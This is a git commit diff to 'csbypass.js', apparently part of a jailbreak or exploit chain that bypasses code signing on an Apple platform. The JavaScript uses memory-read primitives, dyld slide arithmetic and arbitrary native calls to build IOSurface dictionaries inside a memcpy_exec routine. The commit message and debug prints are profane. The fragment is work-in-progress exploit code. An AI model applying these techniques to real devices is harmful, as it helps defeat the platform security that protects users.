diff options
| author | spv420 <spv@spv.sh> | 2022-07-29 14:32:40 -0400 |
|---|---|---|
| committer | spv420 <spv@spv.sh> | 2022-07-29 14:32:40 -0400 |
| commit | fa472ec3d9b5cdb2c1517cf2795ed65434867078 (patch) | |
| tree | 187b690920b03615d8a9cf7f1550e66ac4b1857f /src/js/csbypass.js | |
| parent | eb2358cbd63c897227d5aaa3a1fc3844ad09e26b (diff) | |
fuck this shit i'm out seriously fuck you
Diffstat (limited to 'src/js/csbypass.js')
| -rw-r--r-- | src/js/csbypass.js | 7 |
1 files changed, 5 insertions, 2 deletions
diff --git a/src/js/csbypass.js b/src/js/csbypass.js index 12388a0..cc9302f 100644 --- a/src/js/csbypass.js +++ b/src/js/csbypass.js @@ -13,6 +13,7 @@ var my_kIOSurfaceBytesPerRow; var my_kIOSurfaceWidth; var my_kIOSurfaceHeight; var my_kIOSurfacePixelFormat; +var kCFAllocatorDefault; function csbypass() { printf("hello from csbypass!\n"); @@ -34,11 +35,12 @@ function memcpy_exec(dst, src, size) { printf("%x %x\n", CFDictionarySetValue_addr + get_dyld_shc_slide(), dlsym(dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", RTLD_NOW), "CFDictionarySetValue")); dict = CFDictionaryCreateMutable(0, 0, kCFTypeDictionaryKeyCallBacks_addr + get_dyld_shc_slide(), kCFTypeDictionaryValueCallBacks_addr + get_dyld_shc_slide()); printf("dict: %p\n", dict); - var test = CFNumberCreate(0, kCFNumberSInt32Type, pitch); + var test = CFNumberCreate(read_u32(kCFAllocatorDefault), kCFNumberSInt32Type, pitch); printf("fuck you test=%p %p %p\n", test, pitch, read_u32(dict)); scall("printf", "%x %x %x %x\n", read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide()), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 4), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 8), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 12)); callnarg(CFShow_addr + get_dyld_shc_slide(), dict); - CFDictionarySetValue(dict, read_u32(read_u32(my_kIOSurfaceBytesPerRow)), test, 0); + CFDictionarySetValue(dict, read_u32(my_kIOSurfaceBytesPerRow), test, 0); + printf("lol420\n"); CFDictionarySetValue(dict, read_u32(my_kIOSurfaceWidth), read_u32(my_kIOSurfaceWidth + 4), read_u32(my_kIOSurfaceWidth + 8), read_u32(my_kIOSurfaceWidth + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, width)); CFDictionarySetValue(dict, read_u32(my_kIOSurfaceHeight), read_u32(my_kIOSurfaceHeight + 4), read_u32(my_kIOSurfaceHeight + 8), read_u32(my_kIOSurfaceHeight + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, height)); CFDictionarySetValue(dict, read_u32(my_kIOSurfacePixelFormat), read_u32(my_kIOSurfacePixelFormat + 4), read_u32(my_kIOSurfacePixelFormat + 8), read_u32(my_kIOSurfacePixelFormat + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, pixel_format)); @@ -61,6 +63,7 @@ function linkIOSurface() { my_IOSurfaceAcceleratorTransferSurface = dlsym(h, "IOSurfaceAcceleratorTransferSurface"); CFDictionarySetValue_addr = dlsym(dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", RTLD_NOW), "CFDictionarySetValue") - get_dyld_shc_slide(); + kCFAllocatorDefault = dlsym(dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", RTLD_NOW), "kCFAllocatorDefault"); scall("printf", "%x %x %x\n", my_IOSurfaceAcceleratorCreate, my_IOSurfaceCreate, my_IOSurfaceAcceleratorTransferSurface); } |